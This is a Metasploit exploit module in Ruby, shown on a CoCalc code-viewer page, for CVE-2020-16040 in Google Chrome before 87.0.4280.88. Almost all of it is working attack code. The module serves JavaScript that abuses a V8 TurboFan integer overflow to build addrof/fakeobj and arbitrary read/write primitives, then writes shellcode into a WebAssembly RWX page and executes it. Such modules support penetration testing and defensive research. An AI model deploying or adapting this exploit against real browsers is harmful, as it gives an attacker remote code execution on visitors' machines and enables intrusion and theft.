CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ManualRanking78include Msf::Post::File9include Msf::Exploit::Remote::HttpServer1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase',16'Description' => %q{17This module exploits an issue in Google Chrome versions before 87.0.4280.88 (64 bit).18The exploit makes use of an integer overflow in the SimplifiedLowering phase in turbofan.19It is used along with a type hardening bypass using ArrayPrototypeShift to create a JSArray with a length of -1.20This is abused to gain arbitrary read/write into the isolate region.21Then an ArrayBuffer can be used to achieve absolute arbitrary read/write.22The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode.23The payload is executed within the sandboxed renderer process, the browser must be run with the --no-sandbox option for the payload to work correctly.24},25'License' => MSF_LICENSE,26'Author' => [27'Rajvardhan Agarwal (r4j)', # exploit28],29'References' => [30['CVE', '2020-16040'],31['URL', 'https://chromium-review.googlesource.com/c/v8/v8/+/2557498'],32['URL', 'https://github.com/r4j0x00/exploits/tree/master/CVE-2020-16040'],33['URL', 'https://faraz.faith/2021-01-07-cve-2020-16040-analysis/'],34['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1150649'],35],36'Arch' => [ ARCH_X64 ],37'DefaultTarget' => 0,38'Payload' => {39'Space' => 409640},41'Notes' => {42'Reliability' => [ REPEATABLE_SESSION ],43'SideEffects' => [ IOC_IN_LOGS ],44'Stability' => [CRASH_SERVICE_RESTARTS]45},46'Targets' => [47['Linux - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'linux' }],48['Windows 10 - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'win' }],49['macOS - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'osx' }],50],51'DisclosureDate' => '2020-11-19'52)53)54end5556def on_request_uri(cli, request)57print_status("Sending #{request.uri} to #{request['User-Agent']}")58shellcode = Rex::Text.to_num(payload.encoded).gsub(/\r\n/, '')59jscript = <<~JS60var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])61var wasm_mod = new WebAssembly.Module(wasm_code);62var wasm_instance = new WebAssembly.Instance(wasm_mod);63var wasm_func = wasm_instance.exports.main;6465var buf = new ArrayBuffer(8);66var f64_buf = new Float64Array(buf);67var u64_buf = new Uint32Array(buf);68var shellcode = new Uint8Array([#{shellcode}]);69var shellbuf = new ArrayBuffer(shellcode.length);70var dataview = new DataView(shellbuf);7172function ftoi(val) {73f64_buf[0] = val;74return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);75}7677function itof(val) {78u64_buf[0] = Number(val & 0xffffffffn);79u64_buf[1] = Number(val >> 32n);80return f64_buf[0];81}8283function foo(a) {84var y = 0x7fffffff;8586if (a == NaN) y = NaN;87if (a) y = -1;8889let z = y + 1;90z >>= 31;91z = 0x80000000 - Math.sign(z|1);9293if(a) z = 0;9495var arr = new Array(0-Math.sign(z));96arr.shift();97var cor = [1.1, 1.2, 1.3];9899return [arr, cor];100}101102try {103for(var i=0;i<0x3000;++i)104foo(true);105106var x = foo(false);107} catch (e) {108location.reload();109}110var arr = x[0];111var cor = x[1];112113const idx = 6;114arr[idx+10] = 0x4242;115116function addrof(k) {117arr[idx+1] = k;118return ftoi(cor[0]) & 0xffffffffn;119}120121function fakeobj(k) {122cor[0] = itof(k);123return arr[idx+1];124}125126var float_array_map = ftoi(cor[3]);127128var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];129var fake = fakeobj(addrof(arr2) + 0x20n);130131function arbread(addr) {132if (addr % 2n == 0) {133addr += 1n;134}135arr2[1] = itof((2n << 32n) + addr - 8n);136return ftoi(fake[0]);137}138139function arbwrite(addr, val) {140if (addr % 2n == 0) {141addr += 1n;142}143arr2[1] = itof((2n << 32n) + addr - 8n);144fake[0] = itof(BigInt(val));145}146147function copy_shellcode(addr, shellcode) {148let buf_addr = addrof(shellbuf);149let backing_store_addr = buf_addr + 0x14n;150arbwrite(backing_store_addr, addr);151152for (let i = 0; i < shellcode.length; i++) {153dataview.setUint8(i, shellcode[i]);154}155}156157var rwx_page_addr = arbread(addrof(wasm_instance) + 0x68n);158copy_shellcode(rwx_page_addr, shellcode);159wasm_func();160JS161162html = <<~HTML163<html>164<head>165<script>166#{jscript}167</script>168</head>169<body>170</body>171</html>172HTML173send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })174end175176end177178179